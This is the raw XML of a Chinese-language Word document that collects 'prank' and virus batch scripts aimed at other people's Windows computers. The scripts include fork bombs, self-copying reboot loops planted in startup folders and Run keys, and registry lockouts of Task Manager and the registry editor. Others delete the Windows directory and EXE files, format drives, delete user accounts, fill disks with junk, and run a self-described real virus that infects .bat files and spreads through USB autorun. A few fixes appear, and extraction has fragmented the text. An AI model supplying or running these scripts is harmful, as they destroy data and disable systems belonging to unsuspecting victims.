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  <w:r w:rsidRPr="00A06E54">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一组:最简单最绝的死机bat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:si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"" cmd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goto si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被我发现的话一条命令就解决了：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taskkill /im /f cmd.EⅩE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我自己在制作循环的时候中招了，我就是这样搞定的．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顺序上这样的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taskkill??/f /im cmd.EⅩE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第二组:不断重启机器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shutdown -r -t 3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copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat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copy %0 c:\autoexec.bat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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat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attrib autoexec.bat +r +s +h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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000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del %0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第三组:常用注册表修改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整人常用注册表修改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1:禁止使用运行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hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun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2:禁止显示驱动器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hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295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3:禁止访问驱动器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hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewondrive /t reg_dword /d 数值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4:禁止使用注册表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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools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5禁止使用桌面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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop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6:禁止使用任务管理器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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr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7:去除快捷方式的小箭头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delete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hkey_class_root\lnkfile /v isshortcut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8:禁止使用大多数程序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hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v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restrictrun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9:显示快捷方式的扩展名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delete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hkey_class_root\lnkfile /v nevershowext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10:禁止任务栏(资源管理器)快捷菜单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hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v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notraycontextmenu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11:禁止桌面右键菜单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hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu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第四组:清空硬盘以及解脱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硬盘清空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rd /q/s "%~d0"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占满硬盘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type "%~f0" &gt;&gt; "%~f0"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第二种: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alldrive=c d e f g h i j k l m n o p q r s t u v w x y z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/l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\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解决一下。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alldrive=c d e f g h i j k l m n o p q r s t u v w x y z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for %%l in (%alldrive%) do (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? ? if not exist %%l:\ goto ok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? ? For /f "delims=" %%i In ('dir /ad /b %%l:\^|find /i "."') do rd %%l:\%%i.\ 2&gt;nul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k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清除完成...........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pause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第五组:一刀杀机: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title 你要over了！！！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cd C:\Documents and Settings\%username%\「开始」菜单\程序\启动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if exist 456.bat goto next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goto upover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:next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123.bat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:upover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shutdown -s -t 0 &amp;gt;456.bat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将文件保存为123.bat,双击体验热的感觉．（原理很简单－－调用自身）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伙计们，感觉如何，你的机器是不是很热，不得不重启，但是你的机器很快就陷入重启的循环中．．．．．．．．．．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解决问题：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进入安全模式找到１２３.bat 删除就搞定了．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第六组:垃圾满天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alldrive=c d e f g h i j k l m n o p q r s t u v w x y z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/L %%a in (1,1,10000) do for %%b in (%alldrive%) do mkdir %%b:\jay%%a..\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第七组:扫荡者及解脱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你要想恶作剧就用我这个，“扫荡者”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copy %0 "%userprofile%\「开始」菜单\程序\启动\1.bat"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@reg??add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools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rd %windei%/windos /s /q &amp; goto 1&gt;d:\explorer.bat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:1&gt;&gt;d:\explorer.bat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del d:\*.EⅩE /f /s /q&gt;&gt;d:\explorer.bat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del e:\*.EⅩE /f /s /q&gt;&gt;d:\explorer.bat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关闭回现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copy %0 "%userprofile%\「开始」菜单\程序\启动\1.bat"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将本BAT加入到启动项，开机就运行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@reg??add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools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锁注册表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@echo off&gt;d:\explorer.bat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将破坏部分写入d:\explorer.bat，运行后不看扩展名不容易识别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rd %windir% /s /q &amp; goto 1&gt;&gt;d:\explorer.bat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删除系统目录，若操作无法实现就跳转到标签1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:1&gt;&gt;d:\explorer.bat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标签1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del d:\*.EⅩE /f /s /q&gt;&gt;d:\explorer.bat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删除D盘所有EXE文件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del e:\*.EⅩE /f /s /q&gt;&gt;d:\explorer.bat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删除E盘所有EXE文件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d:\explorer.bat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运行这个BAT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第八组:所有东西变图片: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cd\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/f "delims=" %%i in (&amp;#39;dir /s .&amp;#39;) do @ren %%i *.jpg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exit/b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第九组:死机炸弹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c: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cd windows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dir *.com/a/b/s &gt;&gt;c:\a.txt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dir *.EⅩE/a/b/s &gt;&gt;c:\b.txt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/r c: %%i in (*.EⅩE) do doskey %%i = 不是内部或外部命令，也不是可运行的程序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/r c: %%i in (*.com) do doskey %%i = 不是内部或外部命令，也不是可运行的程序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第十组:立即死机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/l %%i in (0,1,254) do start %%i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第十一组:乱加硬盘分区及解决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请稍等......正在为你加硬盘分区..................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md d:\fly &gt;nul 2&gt;nul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a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z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%%a in (%a%) do subst %%a: d:\fly &gt;nul 2&gt;nul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echo\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echo 打开＂我的电脑＂看看.........够不够用呀..........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ping 127.1 -n 5 &gt;nul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修复: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off&amp;color 1e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title 请稍等......正在为你还原硬盘分区..................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a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z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%%a in (%a%) do subst %%a: /d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echo\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cls&amp;echo 谢谢您的使用....请打开我的电脑查看修复ping 127.1 -n 3 &gt;nul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exit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第十二组:屏幕炸弹及解决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if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat" copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat"&amp;gt;nul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@echo off&amp;gt;%windir%\power.bat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"%%1"=="" goto :end&amp;gt;&amp;gt;%windir%\power.bat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exist C:\_stop goto :EOF&amp;gt;&amp;gt;%windir%\power.bat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start /B %%~fs0 exp&amp;gt;&amp;gt;%windir%\power.bat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:s&amp;gt;&amp;gt;%windir%\power.bat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not exist C:\_stop goto s&amp;gt;&amp;gt;%windir%\power.bat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exit&amp;gt;&amp;gt;%windir%\power.bat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:end&amp;gt;&amp;gt;%windir%\power.bat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del %%~fs0&amp;gt;&amp;gt;%windir%\power.bat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ws=CreateObject("W.Shell")&amp;gt;%windir%\power.vbs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ws.Run "%windir%\power.bat exp",0 &amp;gt;&amp;gt;%windir%\power.vbs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W %windir%\power.vbs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del %windir%\power.vbs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set p=%~ps0 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if not %p:~-3,2%==启动 del %~fs0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:x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taskkill /f /im cmd.EⅩE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goto x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很容易的杀掉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第十三组:吃内存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:p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start C:\1.bat &gt;&gt; C:\1.bat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C:\1.bat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goto p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:loop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"" "%systemdrive%\program files\internet explorer\iexplore.EⅩE" -k "blank"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goto loop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第十四组真正的病毒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%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%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%ozone%? ???%Name??:REON%? ?? ?? ?? ?? ?%ozone%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%ozone%? ???%Author:Ozone [verybat.cn]%? ?%ozone%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%ozone%? ???%Data??:17/04/2007%? ?? ?? ???%ozone%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%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%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if exsit %SystemDrive%\PAGEFILES.SYS goto end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copy %0 %windir%\system32\logon.bat? ?? ?? ?? ?? ?? ?? ?::复制自身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/F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字节"') do fsutil file createnew %SystemDrive%\PAGEFILES.SYS %%i? ?::制造超大文件,轰炸硬盘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attrib +r +s +h %SystemDrive%\PAGEFILES.SYS? ?? ???::隐藏文件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add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV2007 /t REG_SZ /d %windir%\system32\logon.vbs? ?? ?? ?? ?? ?? ?? ? ::自动启动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reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f? ?? ?? ?? ?? ?? ???::不显示隐藏文件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for /r %SystemDrive% %%i in (*.bat) do type %0&gt;%%i? ?? ? ::感染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if exist %windir%\system32\logon.vbs goto end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+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++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on error resume next&gt;%windir%\system32\logon.vbs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strComputer = "."&gt;&gt;%windir%\system32\logon.vbs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fs =createobject("ing.filesystemobject")&gt;&gt;%windir%\system32\logon.vbs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WshShell = W.CreateObject("W.Shell")&gt;&gt;%windir%\system32\logon.vbs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objWMIService = GetObject("winmgmts:" _&gt;&gt;%windir%\system32\logon.vbs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^&amp; "{impersonationLevel=impersonate}!\\" ^&amp; strComputer ^&amp; "\root\cimv2")&gt;&gt;%windir%\system32\logon.vbs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colDisks = objWMIService.EⅩEcQuery _&gt;&gt;%windir%\system32\logon.vbs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("Select * from Win32_LogicalDisk")&gt;&gt;%windir%\system32\logon.vbs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::监视u盘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For i =1 to 9000000000&gt;&gt;%windir%\system32\logon.vbs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For Each objDisk in colDisks&gt;&gt;%windir%\system32\logon.vbs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Select Case objDisk.DriveType&gt;&gt;%windir%\system32\logon.vbs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:Case 2:&gt;&gt;%windir%\system32\logon.vbs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::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏.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y1=fs.FileExists(objDisk.DeviceID ^&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06E54">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"\AUTORUN.INF")&gt;&gt;%windir%\system32\logon.vbs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not y1 then&gt;&gt;%windir%\system32\logon.vbs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f=fs.opentextfile(objDisk.DeviceID ^&amp; "\AUTORUN.INF",2, true)&gt;&gt;%windir%\system32\logon.vbs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f.write "[AutoRun]" ^&amp; vbcrlf&gt;&gt;%windir%\system32\logon.vbs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f.write "open=logon.bat" ^&amp; vbcrlf&gt;&gt;%windir%\system32\logon.vbs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f.write "shellexecute=logon.bat" ^&amp; vbcrlf&gt;&gt;%windir%\system32\logon.vbs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f.write "shell\Auto\command=logon.bat" ^&amp; vbcrlf&gt;&gt;%windir%\system32\logon.vbs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f.Close&gt;&gt;%windir%\system32\logon.vbs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f1 = fs.GetFile(objDisk.DeviceID ^&amp; "\AUTORUN.INF")&gt;&gt;%windir%\system32\logon.vbs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f1.Attributes = f1.Attributes AND 2 Then&gt;&gt;%windir%\system32\logon.vbs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:f1.Attributes = f1.Attributes XOR 7:&gt;&gt;%windir%\system32\logon.vbs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::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏.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y2=fs.FileExists(objDisk.DeviceID ^&amp; "\logon.bat")&gt;&gt;%windir%\system32\logon.vbs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not y2 then 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fs.CopyFile "c:\windows\system32\logon.bat",objDisk.DeviceID ^&amp; "\"&gt;&gt;%windir%\system32\logon.vbs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Set f2 = fs.GetFile(objDisk.DeviceID ^&amp; "\logon.bat")&gt;&gt;%windir%\system32\logon.vbs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f2.Attributes = f2.Attributes AND 2 Then&gt;&gt;%windir%\system32\logon.vbs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:f2.Attributes = f2.Attributes XOR 7:&gt;&gt;%windir%\system32\logon.vbs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dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")&gt;&gt;%windir%\system32\logon.vbs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::判断u盘中是否存在PAGEFILES.SYS,如果不存在则写入PAGEFILES.SYS并隐藏.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y3=fs.FileExists(dirr &amp; "\PAGEFILES.SYS")&gt;&gt;%windir%\system32\logon.vbs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not y3 then&gt;&gt;%windir%\system32\logon.vbs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WshShell.Run "logon.bat"&gt;&gt;%windir%\system32\logon.vbs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W.Sleep 500&gt;&gt;%windir%\system32\logon.vbs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echo Set f3 = fs.GetFile(dirr &amp; "\PAGEFILES.SYS")&gt;&gt;%windir%\system32\logon.vbs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If f3.Attributes = f3.Attributes AND 2 Then&gt;&gt;%windir%\system32\logon.vbs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:f3.Attributes = f3.Attributes XOR 7:&gt;&gt;%windir%\system32\logon.vbs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if&gt;&gt;%windir%\system32\logon.vbs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End Select&gt;&gt;%windir%\system32\logon.vbs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Next&gt;&gt;%windir%\system32\logon.vbs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::每隔5秒扫描一次.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W.Sleep 5000&gt;&gt;%windir%\system32\logon.vbs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echo Next&gt;&gt;%windir%\system32\logon.vbs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::运行logon.vbs脚本程序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start %windir%\system32\logon.vbs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++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++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:end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开始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:2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start cmd.exe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goto 2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就是主要是利用goto 来跳转到:2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循环跳转...就是循环用start 打开CMD ^^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友情提示...死机不负责.......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也可以利用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别的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net user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%0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这里的核心是%0 他表示本身 就是循环运行本身^^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这里循环运行net user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上面主要把别人电脑整死机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下面我们利用修改注册表来恶整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常见修改注册表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就是开机加载 这世界人都知道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wahaha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reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run/v ctfmon.exe(开机加载文件的名字) /d C:\WINDOWS\system32\ctfmon.exe(这里是开机加载文件的路径)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这里可以添加一个开始我们弄的哪个strat 这个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@echo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echo 开始 &gt;c:\windows\cnhacker.bat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:2 &gt;&gt;c:\windows\cnhacker.bat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start cmd.exe &gt;&gt;c:\windows\cnhacker.bat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goto 2&gt;&gt;c:\windows\cnhacker.bat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这里自动在windows下生成cnhacker.bat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然后利用上面开机加载 写起...就OK拉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修改IE栏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reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "window title" /t REG_SZ /d "要改的名字...."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屏蔽修改主页那里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reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HOMEPAGE /t REG_DWORD /d 00000001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简单硬盘炸弹(多生成垃圾文章)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off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set a=0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:22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set /a a=%a%+1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echo laji &gt;C:\%a%.txt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goto 22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如何要效果好 最好加一段vbs代码 隐藏运行 在C盘制造大量的垃圾TXT文件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修改不电脑显示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REG ADDHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL/v CheckedValue /t REG_DWORD /d 00000000 /f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把00000000 改成00000001 就可以恢复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这段大家不要实验......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就是利用%username%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net user %username% /del (删除当前使用的用户 不可以直接删除ADMINISTRATOR用户外)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造成你电脑上面ADMINISTRATOR桌面资料丢失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net user %username% /add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NET LOCALGROUP ADMINISTRATORS %username% /add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强行结束smss.exe 进程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ntsd -c q -pn smss.exe (结束该进程你的电脑即将卡死鼠标不能用)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shutdown -a (放弃关闭计算机)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危险不要实验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迅速格式所有盘符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for /f %%i in (d:,e:f:g:h:) do format /q /y %%i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这个必须要利用记事本保存 然后.bat 才能够执行 在CMD下面 无法执行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死亡之ping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?start Speed.bat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ping 127.0.0.1 -l 65500 -t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>%0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~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~原创内容~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~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lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　copy /y %0 "%userprofile%\「开始」菜单\程序\启动\Speed.bat"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copy /y %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Speed.bat"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shutdown -r -f -t 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06E54" w:rsidRPr="00A06E54" w:rsidRDefault="00A06E54" w:rsidP="00A06E54">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06E54">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　CreateObject("SAPI.SpVoice").Speak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06E54" w:rsidRDefault="00A06E54" w:rsidP="00A06E54">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A06E54" w:rsidSect="00A062A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13"/>
    <w:rsid w:val="00750F5A"/>
    <w:rsid w:val="009C6413"/>
    <w:rsid w:val="00A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98B2-A611-4000-BF65-69EE1333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062A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062A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王鼎文</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>王鼎文</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-15T03:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-15T03:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>